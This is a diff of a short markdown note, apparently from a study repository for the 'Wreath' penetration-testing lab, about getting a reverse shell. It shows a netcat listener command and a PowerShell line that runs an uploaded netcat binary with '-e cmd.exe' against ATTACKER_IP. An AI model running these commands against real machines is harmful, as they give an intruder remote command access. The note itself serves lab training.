kairosart/Wreath/AV EVASION/Compiling Netcat & Reverse Shell!.md

 We now have everything we need to get a reverse shell back from this target.

+#Attacking_Machine
-Set up a netcat listener on your #Attacking_Machine `sudo nc -lvnp 443`
+Set up a netcat listener.

+`sudo nc -lvnp 443`

+ #Webshell
-In your #webshell, use the following command:
+ Use the following command:

 `powershell.exe c:\\windows\\task\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe   `